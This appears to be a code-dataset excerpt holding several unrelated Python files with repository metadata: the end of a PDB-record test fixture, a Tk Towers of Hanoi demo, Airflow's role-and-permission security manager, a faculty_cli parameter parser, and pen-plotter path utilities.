ATOM 21 CD GLU A 2 14.152 5.903 9.124 1.00 17.43 C
ATOM 22 OE1 GLU A 2 14.556 6.396 8.052 1.00 18.62 O
ATOM 23 OE2 GLU A 2 14.769 5.000 9.734 1.00 17.26 O
ATOM 24 H GLU A 2 10.307 8.616 7.751 1.00 15.28 H
ATOM 25 HA GLU A 2 10.334 7.388 9.972 1.00 14.99 H
ATOM 26 HB2 GLU A 2 12.604 7.912 8.318 1.00 16.20 H
ATOM 27 HB3 GLU A 2 11.622 6.681 8.099 1.00 16.20 H
ATOM 28 HG2 GLU A 2 13.101 6.970 10.482 1.00 17.22 H
ATOM 29 HG3 GLU A 2 12.344 5.661 9.995 1.00 17.22 H
HETATM 30 O1 SO4 A 101 11.629 25.000 26.048 0.50 20.11 O
HETATM 31 O2 SO4 A 101 10.541 22.822 26.297 0.50 21.85 O
HETATM 32 O3 SO4 A 101 9.524 24.537 24.875 0.50 20.45 O
HETATM 33 O4 SO4 A 101 9.520 24.852 27.270 0.50 19.22 O
HETATM 34 S SO4 A 101 10.313 24.291 26.126 0.50 19.91 S
HETATM 35 C1 SIN A 0 10.126 11.723 7.051 1.00 19.39 C
HETATM 36 C2 SIN A 0 10.828 12.260 5.817 1.00 21.62 C
HETATM 37 C3 SIN A 0 11.448 13.629 6.056 1.00 22.69 C
HETATM 38 C4 SIN A 0 10.468 14.784 6.095 1.00 23.92 C
HETATM 39 O1 SIN A 0 10.519 11.999 8.189 1.00 19.91 O
HETATM 40 O3 SIN A 0 10.949 15.933 6.216 1.00 24.14 O
HETATM 41 O4 SIN A 0 9.264 14.547 6.337 1.00 25.37 O
HETATM 42 H21 SIN A 0 10.110 12.330 5.000 1.00 21.62 H
HETATM 43 H22 SIN A 0 11.609 11.561 5.518 1.00 21.62 H
HETATM 44 H31 SIN A 0 11.985 13.602 7.004 1.00 22.69 H
HETATM 45 H32 SIN A 0 12.173 13.820 5.265 1.00 22.69 H
'''
if (__name__ == "__main__"):
  start = time.time()
  run()
  # report wall-clock time for the whole suite
  print("OK. Time: %8.3f"%(time.time()-start))
| 58.639752
| 85
| 0.482841
|
4a0207ef42bdf2c818189af5f0e3be20407f4545
| 4,765
|
py
|
Python
|
my-electron-app/src/components/python_terminal/python/Tools/demo/hanoi.py
|
diesisfox/ECE496
|
9864bfe2426d1f7e94776f63e3e477f37798754f
|
[
"MIT"
] | 1
|
2021-01-09T14:48:12.000Z
|
2021-01-09T14:48:12.000Z
|
Tools/demo/hanoi.py
|
Krrishdhaneja/cpython
|
9ae9ad8ba35cdcece7ded73cd2207e4f8cb85578
|
[
"0BSD"
] | 1
|
2021-02-24T02:25:12.000Z
|
2021-02-24T02:25:12.000Z
|
my-electron-app/src/components/python_terminal/python/Tools/demo/hanoi.py
|
diesisfox/ECE496
|
9864bfe2426d1f7e94776f63e3e477f37798754f
|
[
"MIT"
] | 1
|
2022-03-28T19:28:45.000Z
|
2022-03-28T19:28:45.000Z
|
#!/usr/bin/env python3
"""
Animated Towers of Hanoi using Tk with optional bitmap file in background.
Usage: hanoi.py [n [bitmapfile]]
n is the number of pieces to animate; default is 4, maximum 15.
The bitmap file can be any X11 bitmap file (look in /usr/include/X11/bitmaps for
samples); it is displayed as the background of the animation. Default is no
bitmap.
"""
from tkinter import Tk, Canvas
# Basic Towers-of-Hanoi algorithm: move n pieces from a to b, using c
# as temporary. For each move, call report()
def hanoi(n, a, b, c, report):
    """Move n pieces from peg a to peg b, using peg c as scratch space.

    Calls report(piece, source, destination) once per individual move,
    in order.  Does nothing when n <= 0.
    """
    if n > 0:
        hanoi(n - 1, a, c, b, report)
        report(n, a, b)
        hanoi(n - 1, c, b, a, report)
# The graphical interface
class Tkhanoi:
    """Animated Towers of Hanoi rendered on a Tk canvas.

    Pegs are black rectangles, pieces are red rectangles; an optional X11
    bitmap can be drawn as the background.
    """
    # Create our objects
    def __init__(self, n, bitmap=None):
        """Build the canvas, three pegs, and n pieces stacked on peg 0.

        n: number of pieces; bitmap: optional Tk bitmap spec for the background.
        """
        self.n = n
        self.tk = tk = Tk()
        self.canvas = c = Canvas(tk)
        c.pack()
        width, height = tk.getint(c['width']), tk.getint(c['height'])
        # Add background bitmap
        if bitmap:
            self.bitmap = c.create_bitmap(width//2, height//2,
                                          bitmap=bitmap,
                                          foreground='blue')
        # Generate pegs
        pegwidth = 10
        pegheight = height//2
        pegdist = width//3
        x1, y1 = (pegdist-pegwidth)//2, height*1//3
        x2, y2 = x1+pegwidth, y1+pegheight
        self.pegs = []
        p = c.create_rectangle(x1, y1, x2, y2, fill='black')
        self.pegs.append(p)
        x1, x2 = x1+pegdist, x2+pegdist
        p = c.create_rectangle(x1, y1, x2, y2, fill='black')
        self.pegs.append(p)
        x1, x2 = x1+pegdist, x2+pegdist
        p = c.create_rectangle(x1, y1, x2, y2, fill='black')
        self.pegs.append(p)
        self.tk.update()
        # Generate pieces (widest at the bottom; width shrinks by dx per piece)
        pieceheight = pegheight//16
        maxpiecewidth = pegdist*2//3
        minpiecewidth = 2*pegwidth
        # pegstate[i] lists the piece numbers currently stacked on peg i
        self.pegstate = [[], [], []]
        # pieces maps piece number -> canvas rectangle id
        self.pieces = {}
        x1, y1 = (pegdist-maxpiecewidth)//2, y2-pieceheight-2
        x2, y2 = x1+maxpiecewidth, y1+pieceheight
        dx = (maxpiecewidth-minpiecewidth) // (2*max(1, n-1))
        for i in range(n, 0, -1):
            p = c.create_rectangle(x1, y1, x2, y2, fill='red')
            self.pieces[i] = p
            self.pegstate[0].append(i)
            x1, x2 = x1 + dx, x2-dx
            y1, y2 = y1 - pieceheight-2, y2-pieceheight-2
            self.tk.update()
            self.tk.after(25)
    # Run -- never returns
    def run(self):
        """Animate forever, cycling the solution through every peg pairing."""
        while True:
            hanoi(self.n, 0, 1, 2, self.report)
            hanoi(self.n, 1, 2, 0, self.report)
            hanoi(self.n, 2, 0, 1, self.report)
            hanoi(self.n, 0, 2, 1, self.report)
            hanoi(self.n, 2, 1, 0, self.report)
            hanoi(self.n, 1, 0, 2, self.report)
    # Reporting callback for the actual hanoi function
    def report(self, i, a, b):
        """Animate moving piece i from peg a to peg b, one pixel per frame."""
        if self.pegstate[a][-1] != i: raise RuntimeError # Assertion
        del self.pegstate[a][-1]
        p = self.pieces[i]
        c = self.canvas
        # Lift the piece above peg a
        ax1, ay1, ax2, ay2 = c.bbox(self.pegs[a])
        while True:
            x1, y1, x2, y2 = c.bbox(p)
            if y2 < ay1: break
            c.move(p, 0, -1)
            self.tk.update()
        # Move it towards peg b
        bx1, by1, bx2, by2 = c.bbox(self.pegs[b])
        newcenter = (bx1+bx2)//2
        while True:
            x1, y1, x2, y2 = c.bbox(p)
            center = (x1+x2)//2
            if center == newcenter: break
            if center > newcenter: c.move(p, -1, 0)
            else: c.move(p, 1, 0)
            self.tk.update()
        # Move it down on top of the previous piece
        pieceheight = y2-y1
        newbottom = by2 - pieceheight*len(self.pegstate[b]) - 2
        while True:
            x1, y1, x2, y2 = c.bbox(p)
            if y2 >= newbottom: break
            c.move(p, 0, 1)
            self.tk.update()
        # Update peg state
        self.pegstate[b].append(i)
def main():
    """Parse command-line arguments and start the animation (never returns)."""
    import sys
    # First argument: number of pieces (default 4).
    n = int(sys.argv[1]) if sys.argv[1:] else 4
    # Second argument: optional bitmap file. The leading '@' convention is
    # inverted relative to Tk: a user-supplied '@' is stripped, otherwise
    # '@' is prepended so Tk treats the value as a file name.
    if sys.argv[2:]:
        bitmap = sys.argv[2]
        bitmap = bitmap[1:] if bitmap[0] == '@' else '@' + bitmap
    else:
        bitmap = None
    # Build the graphical objects and run the endless animation loop.
    app = Tkhanoi(n, bitmap)
    app.run()

# Script entry point
if __name__ == '__main__':
    main()
| 30.741935
| 81
| 0.516055
|
4a0208045c7af48626b5b9197008b271edb7bd84
| 20,717
|
py
|
Python
|
airflow/www/security.py
|
fxdmhtt/airflow
|
cf88f7bc7bbd3e9bf110e98f025759a96c130235
|
[
"Apache-2.0"
] | 3
|
2016-05-12T07:36:24.000Z
|
2018-08-18T15:04:23.000Z
|
airflow/www/security.py
|
fxdmhtt/airflow
|
cf88f7bc7bbd3e9bf110e98f025759a96c130235
|
[
"Apache-2.0"
] | 3
|
2020-03-08T15:43:38.000Z
|
2021-09-29T17:26:10.000Z
|
airflow/www/security.py
|
upjohnc/airflow-upjohn-k8s
|
caadbc1618d73e054de99138b0892cea3a9327c4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 5
|
2017-06-19T19:55:47.000Z
|
2020-10-10T00:49:20.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from flask import g
from flask_appbuilder.security.sqla import models as sqla_models
from flask_appbuilder.security.sqla.manager import SecurityManager
from sqlalchemy import or_
from airflow import models
from airflow.exceptions import AirflowException
from airflow.www.app import appbuilder
from airflow.utils.db import provide_session
from airflow.utils.log.logging_mixin import LoggingMixin
EXISTING_ROLES = {
'Admin',
'Viewer',
'User',
'Op',
'Public',
}
class AirflowSecurityManager(SecurityManager, LoggingMixin):
    """Flask-AppBuilder security manager customized for Airflow.

    Declares the view-menus and permissions granted to the built-in roles
    (Viewer, User, Op, Admin, Public), and keeps DAG-level permission
    view-menus ('can_dag_read'/'can_dag_edit' per dag_id) in sync with the
    FAB security tables.
    """
    ###########################################################################
    # VIEW MENUS
    ###########################################################################
    # [START security_viewer_vms]
    VIEWER_VMS = {
        'Airflow',
        'DagModelView',
        'Browse',
        'DAG Runs',
        'DagRunModelView',
        'Task Instances',
        'TaskInstanceModelView',
        'SLA Misses',
        'SlaMissModelView',
        'Jobs',
        'JobModelView',
        'Logs',
        'LogModelView',
        'Docs',
        'Documentation',
        'Github',
        'About',
        'Version',
        'VersionView',
    }
    # [END security_viewer_vms]
    USER_VMS = VIEWER_VMS
    # [START security_op_vms]
    OP_VMS = {
        'Admin',
        'Configurations',
        'ConfigurationView',
        'Connections',
        'ConnectionModelView',
        'Pools',
        'PoolModelView',
        'Variables',
        'VariableModelView',
        'XComs',
        'XComModelView',
    }
    # [END security_op_vms]
    ###########################################################################
    # PERMISSIONS
    ###########################################################################
    # [START security_viewer_perms]
    VIEWER_PERMS = {
        'menu_access',
        'can_index',
        'can_list',
        'can_show',
        'can_chart',
        'can_dag_stats',
        'can_dag_details',
        'can_task_stats',
        'can_code',
        'can_log',
        'can_get_logs_with_metadata',
        'can_tries',
        'can_graph',
        'can_tree',
        'can_task',
        'can_task_instances',
        'can_xcom',
        'can_gantt',
        'can_landing_times',
        'can_duration',
        'can_blocked',
        'can_rendered',
        'can_version',
    }
    # [END security_viewer_perms]
    # [START security_user_perms]
    USER_PERMS = {
        'can_dagrun_clear',
        'can_run',
        'can_trigger',
        'can_add',
        'can_edit',
        'can_delete',
        'can_paused',
        'can_refresh',
        'can_success',
        'muldelete',
        'set_failed',
        'set_running',
        'set_success',
        'clear',
        'can_clear',
    }
    # [END security_user_perms]
    # [START security_op_perms]
    OP_PERMS = {
        'can_conf',
        'can_varimport',
    }
    # [END security_op_perms]
    # global view-menu for dag-level access
    DAG_VMS = {
        'all_dags'
    }
    WRITE_DAG_PERMS = {
        'can_dag_edit',
    }
    READ_DAG_PERMS = {
        'can_dag_read',
    }
    DAG_PERMS = WRITE_DAG_PERMS | READ_DAG_PERMS
    ###########################################################################
    # DEFAULT ROLE CONFIGURATIONS
    ###########################################################################
    ROLE_CONFIGS = [
        {
            'role': 'Viewer',
            'perms': VIEWER_PERMS | READ_DAG_PERMS,
            'vms': VIEWER_VMS | DAG_VMS
        },
        {
            'role': 'User',
            'perms': VIEWER_PERMS | USER_PERMS | DAG_PERMS,
            'vms': VIEWER_VMS | DAG_VMS | USER_VMS,
        },
        {
            'role': 'Op',
            'perms': VIEWER_PERMS | USER_PERMS | OP_PERMS | DAG_PERMS,
            'vms': VIEWER_VMS | DAG_VMS | USER_VMS | OP_VMS,
        },
    ]
    def init_role(self, role_name, role_vms, role_perms):
        """
        Initialize the role with the permissions and related view-menus.

        Only populates permissions when the role currently has none, so an
        administrator's manual edits to an existing role are preserved.

        :param role_name: name of the role to create or initialize
        :param role_vms: view-menu names to grant
        :param role_perms: permission names to grant
        :return: None
        """
        pvms = self.get_session.query(sqla_models.PermissionView).all()
        # Drop orphaned rows missing either side of the association.
        pvms = [p for p in pvms if p.permission and p.view_menu]
        role = self.find_role(role_name)
        if not role:
            role = self.add_role(role_name)
        if len(role.permissions) == 0:
            self.log.info('Initializing permissions for role:%s in the database.', role_name)
            role_pvms = set()
            for pvm in pvms:
                if pvm.view_menu.name in role_vms and pvm.permission.name in role_perms:
                    role_pvms.add(pvm)
            role.permissions = list(role_pvms)
            self.get_session.merge(role)
            self.get_session.commit()
        else:
            self.log.debug('Existing permissions for the role:%s '
                           'within the database will persist.', role_name)
    def delete_role(self, role_name):
        """Delete the given Role

        :param role_name: the name of a role in the ab_role table
        :raises AirflowException: if no role with that name exists
        """
        session = self.get_session
        role = session.query(sqla_models.Role)\
            .filter(sqla_models.Role.name == role_name)\
            .first()
        if role:
            self.log.info("Deleting role '%s'", role_name)
            session.delete(role)
            session.commit()
        else:
            raise AirflowException("Role named '{}' does not exist".format(
                role_name))
    def get_user_roles(self, user=None):
        """
        Get all the roles associated with the user.

        :param user: the ab_user in FAB model; defaults to the current
            request user (flask.g.user).
        :return: a list of roles associated with the user.
        """
        if user is None:
            user = g.user
        if user.is_anonymous:
            # Anonymous users only get the configured public role, if any.
            public_role = appbuilder.config.get('AUTH_ROLE_PUBLIC')
            return [appbuilder.security_manager.find_role(public_role)] \
                if public_role else []
        return user.roles
    def get_all_permissions_views(self):
        """
        Returns a set of tuples with the perm name and view menu name
        for every permission-view granted to the current user's roles.
        """
        perms_views = set()
        for role in self.get_user_roles():
            perms_views.update({(perm_view.permission.name, perm_view.view_menu.name)
                                for perm_view in role.permissions})
        return perms_views
    def get_accessible_dag_ids(self, username=None):
        """
        Return a set of dags that user has access to(either read or write).

        :param username: Name of the user.
        :return: A set of dag ids that the user could access.
        """
        if not username:
            username = g.user
        # NOTE(review): 'Public' is compared against Role objects here, not
        # role names — confirm this membership test behaves as intended.
        if username.is_anonymous or 'Public' in username.roles:
            # return an empty set if the role is public
            return set()
        roles = {role.name for role in username.roles}
        if {'Admin', 'Viewer', 'User', 'Op'} & roles:
            # Built-in roles get the global 'all_dags' view-menu.
            return self.DAG_VMS
        user_perms_views = self.get_all_permissions_views()
        # return a set of all dags that the user could access
        return set([view for perm, view in user_perms_views if perm in self.DAG_PERMS])
    def has_access(self, permission, view_name, user=None):
        """
        Verify whether a given user could perform certain permission
        (e.g can_read, can_write) on the given dag_id.

        :param permission: permission on dag_id(e.g can_read, can_edit).
        :type permission: str
        :param view_name: name of view-menu(e.g dag id is a view-menu as well).
        :type view_name: str
        :param user: user name
        :type user: str
        :return: a bool whether user could perform certain permission on the dag_id.
        :rtype: bool
        """
        if not user:
            user = g.user
        if user.is_anonymous:
            return self.is_item_public(permission, view_name)
        return self._has_view_access(user, permission, view_name)
    def _get_and_cache_perms(self):
        """
        Cache permissions-views on self.perms for fast repeated lookups.
        """
        self.perms = self.get_all_permissions_views()
    def _has_role(self, role_name_or_list):
        """
        Whether the user has this role name (accepts one name or a list).
        """
        if not isinstance(role_name_or_list, list):
            role_name_or_list = [role_name_or_list]
        return any(
            [r.name in role_name_or_list for r in self.get_user_roles()])
    def _has_perm(self, permission_name, view_menu_name):
        """
        Whether the user has this perm; rebuilds the cache on a miss so a
        freshly-granted permission is still found.
        """
        if hasattr(self, 'perms'):
            if (permission_name, view_menu_name) in self.perms:
                return True
        # rebuild the permissions set
        self._get_and_cache_perms()
        return (permission_name, view_menu_name) in self.perms
    def has_all_dags_access(self):
        """
        Has all the dag access in any of the 3 cases:
        1. Role needs to be in (Admin, Viewer, User, Op).
        2. Has can_dag_read permission on all_dags view.
        3. Has can_dag_edit permission on all_dags view.
        """
        return (
            self._has_role(['Admin', 'Viewer', 'Op', 'User']) or
            self._has_perm('can_dag_read', 'all_dags') or
            self._has_perm('can_dag_edit', 'all_dags'))
    def clean_perms(self):
        """
        FAB leaves faulty permissions that need to be cleaned up:
        permission-view rows missing either their permission or view-menu.
        """
        self.log.debug('Cleaning faulty perms')
        sesh = self.get_session
        pvms = (
            sesh.query(sqla_models.PermissionView)
            .filter(or_(
                sqla_models.PermissionView.permission == None,  # noqa pylint: disable=singleton-comparison
                sqla_models.PermissionView.view_menu == None,  # noqa pylint: disable=singleton-comparison
            ))
        )
        deleted_count = pvms.delete()
        sesh.commit()
        if deleted_count:
            self.log.info('Deleted %s faulty permissions', deleted_count)
    def _merge_perm(self, permission_name, view_menu_name):
        """
        Add the (permission, view_menu) pair to ab_permission_view_role if it
        does not exist. It will add the related entry to ab_permission
        and ab_view_menu two meta tables as well.

        :param permission_name: Name of the permission.
        :type permission_name: str
        :param view_menu_name: Name of the view-menu
        :type view_menu_name: str
        :return: None
        """
        permission = self.find_permission(permission_name)
        view_menu = self.find_view_menu(view_menu_name)
        pv = None
        if permission and view_menu:
            pv = self.get_session.query(self.permissionview_model).filter_by(
                permission=permission, view_menu=view_menu).first()
        if not pv and permission_name and view_menu_name:
            self.add_permission_view_menu(permission_name, view_menu_name)
    @provide_session
    def create_custom_dag_permission_view(self, session=None):
        """
        Workflow:
        1. Fetch all the existing (permissions, view-menu) from Airflow DB.
        2. Fetch all the existing dag models that are either active or paused. Exclude the subdags.
        3. Create both read and write permission view-menus relation for every dags from step 2
        4. Find out all the dag specific roles(excluded pubic, admin, viewer, op, user)
        5. Get all the permission-vm owned by the user role.
        6. Grant all the user role's permission-vm except the all-dag view-menus to the dag roles.
        7. Commit the updated permission-vm-role into db

        :return: None.
        """
        self.log.debug('Fetching a set of all permission, view_menu from FAB meta-table')
        def merge_pv(perm, view_menu):
            """Create permission view menu only if it doesn't exist"""
            if view_menu and perm and (view_menu, perm) not in all_pvs:
                self._merge_perm(perm, view_menu)
        all_pvs = set()
        for pv in self.get_session.query(self.permissionview_model).all():
            if pv.permission and pv.view_menu:
                all_pvs.add((pv.permission.name, pv.view_menu.name))
        # Get all the active / paused dags and insert them into a set
        all_dags_models = session.query(models.DagModel)\
            .filter(or_(models.DagModel.is_active, models.DagModel.is_paused))\
            .filter(~models.DagModel.is_subdag).all()
        # create can_dag_edit and can_dag_read permissions for every dag(vm)
        for dag in all_dags_models:
            for perm in self.DAG_PERMS:
                merge_pv(perm, dag.dag_id)
        # for all the dag-level role, add the permission of viewer
        # with the dag view to ab_permission_view
        all_roles = self.get_all_roles()
        user_role = self.find_role('User')
        dag_role = [role for role in all_roles if role.name not in EXISTING_ROLES]
        update_perm_views = []
        # need to remove all_dag vm from all the existing view-menus
        dag_vm = self.find_view_menu('all_dags')
        ab_perm_view_role = sqla_models.assoc_permissionview_role
        perm_view = self.permissionview_model
        view_menu = self.viewmenu_model
        # Permission-views held by 'User', minus the global all_dags view-menu.
        all_perm_view_by_user = session.query(ab_perm_view_role)\
            .join(perm_view, perm_view.id == ab_perm_view_role
                  .columns.permission_view_id)\
            .filter(ab_perm_view_role.columns.role_id == user_role.id)\
            .join(view_menu)\
            .filter(perm_view.view_menu_id != dag_vm.id)
        all_perm_views = set([role.permission_view_id for role in all_perm_view_by_user])
        for role in dag_role:
            # Get all the perm-view of the role
            existing_perm_view_by_user = self.get_session.query(ab_perm_view_role)\
                .filter(ab_perm_view_role.columns.role_id == role.id)
            existing_perms_views = set([pv.permission_view_id
                                        for pv in existing_perm_view_by_user])
            missing_perm_views = all_perm_views - existing_perms_views
            for perm_view_id in missing_perm_views:
                update_perm_views.append({'permission_view_id': perm_view_id,
                                          'role_id': role.id})
        if update_perm_views:
            # Bulk-insert the missing role grants in a single statement.
            self.get_session.execute(ab_perm_view_role.insert(), update_perm_views)
        self.get_session.commit()
    def update_admin_perm_view(self):
        """
        Admin should have all the permission-views.
        Add the missing ones to the table for admin.

        :return: None.
        """
        pvms = self.get_session.query(sqla_models.PermissionView).all()
        pvms = [p for p in pvms if p.permission and p.view_menu]
        admin = self.find_role('Admin')
        admin.permissions = list(set(admin.permissions) | set(pvms))
        self.get_session.commit()
    def sync_roles(self):
        """
        1. Init the default role(Admin, Viewer, User, Op, public)
           with related permissions.
        2. Init the custom role(dag-user) with related permissions.

        :return: None.
        """
        self.log.debug('Start syncing user roles.')
        # Create global all-dag VM
        self.create_perm_vm_for_all_dag()
        # Create default user role.
        for config in self.ROLE_CONFIGS:
            role = config['role']
            vms = config['vms']
            perms = config['perms']
            self.init_role(role, vms, perms)
        self.create_custom_dag_permission_view()
        # init existing roles, the rest role could be created through UI.
        self.update_admin_perm_view()
        self.clean_perms()
    def sync_perm_for_dag(self, dag_id, access_control=None):
        """
        Sync permissions for given dag id. The dag id surely exists in our dag bag
        as only / refresh button or cli.sync_perm will call this function

        :param dag_id: the ID of the DAG whose permissions should be updated
        :type dag_id: string
        :param access_control: a dict where each key is a rolename and
            each value is a set() of permission names (e.g.,
            {'can_dag_read'}
        :type access_control: dict
        :return: None
        """
        for dag_perm in self.DAG_PERMS:
            perm_on_dag = self.find_permission_view_menu(dag_perm, dag_id)
            if perm_on_dag is None:
                self.add_permission_view_menu(dag_perm, dag_id)
        if access_control:
            self._sync_dag_view_permissions(dag_id, access_control)
    def _sync_dag_view_permissions(self, dag_id, access_control):
        """Set the access policy on the given DAG's ViewModel.

        :param dag_id: the ID of the DAG whose permissions should be updated
        :type dag_id: string
        :param access_control: a dict where each key is a rolename and
            each value is a set() of permission names (e.g.,
            {'can_dag_read'}
        :type access_control: dict
        :raises AirflowException: if the mapping names an unknown role or an
            invalid permission
        """
        def _get_or_create_dag_permission(perm_name):
            # Look up the DAG-scoped permission-view, creating it on demand.
            dag_perm = self.find_permission_view_menu(perm_name, dag_id)
            if not dag_perm:
                self.log.info(
                    "Creating new permission '%s' on view '%s'",
                    perm_name, dag_id
                )
                dag_perm = self.add_permission_view_menu(perm_name, dag_id)
            return dag_perm
        def _revoke_stale_permissions(dag_view):
            # Remove grants (except Admin's) no longer listed in access_control.
            existing_dag_perms = self.find_permissions_view_menu(dag_view)
            for perm in existing_dag_perms:
                non_admin_roles = [role for role in perm.role
                                   if role.name != 'Admin']
                for role in non_admin_roles:
                    target_perms_for_role = access_control.get(role.name, {})
                    if perm.permission.name not in target_perms_for_role:
                        self.log.info(
                            "Revoking '%s' on DAG '%s' for role '%s'",
                            perm.permission, dag_id, role.name
                        )
                        self.del_permission_role(role, perm)
        dag_view = self.find_view_menu(dag_id)
        if dag_view:
            _revoke_stale_permissions(dag_view)
        for rolename, perms in access_control.items():
            role = self.find_role(rolename)
            if not role:
                raise AirflowException(
                    "The access_control mapping for DAG '{}' includes a role "
                    "named '{}', but that role does not exist".format(
                        dag_id,
                        rolename))
            perms = set(perms)
            invalid_perms = perms - self.DAG_PERMS
            if invalid_perms:
                raise AirflowException(
                    "The access_control map for DAG '{}' includes the following "
                    "invalid permissions: {}; The set of valid permissions "
                    "is: {}".format(dag_id,
                                    (perms - self.DAG_PERMS),
                                    self.DAG_PERMS))
            for perm_name in perms:
                dag_perm = _get_or_create_dag_permission(perm_name)
                self.add_permission_role(role, dag_perm)
    def create_perm_vm_for_all_dag(self):
        """
        Create perm-vm if not exist and insert into FAB security model for all-dags.
        """
        # create perm for global logical dag
        for dag_vm in self.DAG_VMS:
            for perm in self.DAG_PERMS:
                self._merge_perm(permission_name=perm,
                                 view_menu_name=dag_vm)
| 35.780656
| 107
| 0.582179
|
4a020958ce0637920478a7644e63de6df263eec7
| 2,271
|
py
|
Python
|
faculty_cli/parse.py
|
ASIDataScience/faculty-cli
|
9acbac4d6a84ba0728ad8ef1ea03045ad966e5fb
|
[
"Apache-2.0"
] | 3
|
2019-01-21T13:42:31.000Z
|
2019-01-30T15:31:23.000Z
|
faculty_cli/parse.py
|
ASIDataScience/faculty-cli
|
9acbac4d6a84ba0728ad8ef1ea03045ad966e5fb
|
[
"Apache-2.0"
] | 2
|
2019-01-23T13:40:44.000Z
|
2019-01-30T12:17:42.000Z
|
faculty_cli/parse.py
|
ASIDataScience/faculty-cli
|
9acbac4d6a84ba0728ad8ef1ea03045ad966e5fb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016-2022 Faculty Science Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import namedtuple
# Character used to escape delimiters in CLI parameter strings.
ESCAPE_CHAR = "\\"

# A run reference: 'N' (subrun_number is None) or 'N.M'.
RunIdentifier = namedtuple("RunIdentifier", ["run_number", "subrun_number"])


def parse_run_identifier(string):
    """Parse 'N' or 'N.M' into a RunIdentifier, raising ValueError otherwise."""
    try:
        parts = tuple(int(piece) for piece in string.split(".", 2))
    except ValueError:
        raise ValueError("Invalid run identifier: {}".format(string))
    if len(parts) == 1:
        return RunIdentifier(parts[0], None)
    if len(parts) == 2:
        return RunIdentifier(*parts)
    raise ValueError("Invalid run identifier: {}".format(string))
def _escape_split(string, delimiter):
    """Split *string* on *delimiter*, honouring ESCAPE_CHAR-escaped delimiters.

    An escaped delimiter is kept literally in the current chunk; escaping any
    other character keeps the backslash. A trailing lone escape is dropped.
    """
    parts, chunk = [], ""
    pending_escape = False
    for ch in string:
        # The escape char always arms (or re-arms) escape mode first.
        if ch == ESCAPE_CHAR:
            pending_escape = True
            continue
        if pending_escape:
            chunk += ch if ch == delimiter else ESCAPE_CHAR + ch
            pending_escape = False
        elif ch == delimiter:
            parts.append(chunk)
            chunk = ""
        else:
            chunk += ch
    parts.append(chunk)
    return parts
def parse_parameter_values(parameter_value_string):
    """Parse a parameter value string from the CLI and return as a dict."""
    parameter_values = {}
    for part in _escape_split(parameter_value_string, ","):
        # Skip empty segments (e.g. trailing commas).
        if not part.strip():
            continue
        try:
            name, value = _escape_split(part, "=")
        except ValueError:
            raise ValueError("Invalid parameter value: {}".format(part))
        parameter_values[name] = value
    return parameter_values
| 29.115385
| 76
| 0.632321
|
4a020a327eb6648b8b5737634b2d7a1fedc35572
| 1,777
|
py
|
Python
|
eleksdrawpy/util.py
|
basjacobs93/xy
|
7f9bbd089e29785eb905567aa4a0aac25c650ebd
|
[
"MIT"
] | 4
|
2020-05-09T21:34:06.000Z
|
2022-02-14T18:05:09.000Z
|
eleksdrawpy/util.py
|
basjacobs93/xy
|
7f9bbd089e29785eb905567aa4a0aac25c650ebd
|
[
"MIT"
] | null | null | null |
eleksdrawpy/util.py
|
basjacobs93/xy
|
7f9bbd089e29785eb905567aa4a0aac25c650ebd
|
[
"MIT"
] | null | null | null |
from .device import Device
from .drawing import Drawing
from shapely.geometry import LineString
import math
from .progress import Bar
import time
def simplify(points, tolerance=0.05):
    """Simplify a polyline with shapely; fewer than 2 points pass through unchanged."""
    if len(points) < 2:
        return points
    simplified = LineString(points).simplify(tolerance)
    return list(simplified.coords)
def simplify_paths(paths, tolerance=0.05):
    """Apply simplify() to every path in *paths*."""
    return [simplify(path, tolerance) for path in paths]
def join_paths(paths, tolerance=0.05):
    """Merge consecutive paths whose endpoints lie within *tolerance* of each other.

    The merged path keeps both the joining endpoint and the next path's first
    point (they may be near-duplicates).
    """
    if len(paths) < 2:
        return paths
    joined = [list(paths[0])]
    for path in paths[1:]:
        last_x, last_y = joined[-1][-1]
        first_x, first_y = path[0]
        if math.hypot(first_x - last_x, first_y - last_y) <= tolerance:
            joined[-1].extend(path)
        else:
            joined.append(list(path))
    return joined
def remove_duplicates(paths):
    """Drop paths that exactly repeat an earlier path; order is preserved."""
    seen = set()
    unique = []
    for path in paths:
        # Tuple of (x, y) pairs is hashable and captures the full geometry.
        key = tuple((x, y) for x, y in path)
        if key not in seen:
            seen.add(key)
            unique.append(path)
    return unique
def draw(x, tolerance=0.05, verbose = False):
    """Send a Drawing or list of paths to the plotter device.

    Lifts the pen, homes the device, then draws each path (optionally
    simplified with *tolerance*) while showing a progress bar.
    """
    if isinstance(x, Drawing):
        x = x.paths
    device = Device(verbose)
    # Fixed delays give the hardware time to settle between commands —
    # presumably required by the controller; do not reorder.
    time.sleep(2)
    device.pen_up()
    time.sleep(1)
    device.home()
    bar = Bar()
    for path in bar(x):
        if tolerance:
            path = simplify(path, tolerance)
        device.draw(path)
def parse_svg_path(line):
    """Parse a minimal SVG path string of 'M'/'L' commands into point lists.

    Each 'M' starts a new sub-path; only sub-paths with at least two points
    are kept. Commands are whitespace-separated, e.g. "M0,0 L1,2".
    Note: command letters are upper-cased, so relative m/l are treated as
    absolute; other commands are parsed for coordinates but ignored.
    """
    paths = []
    current = []
    for token in line.split():
        command = token[0].upper()
        x, y = map(float, token[1:].split(','))
        if command == 'M':
            # Flush the previous sub-path if it holds more than one point.
            if len(current) > 1:
                paths.append(current)
            current = [(x, y)]
        elif command == 'L':
            current.append((x, y))
    if len(current) > 1:
        paths.append(current)
    return paths
| 24.680556
| 50
| 0.558244
|
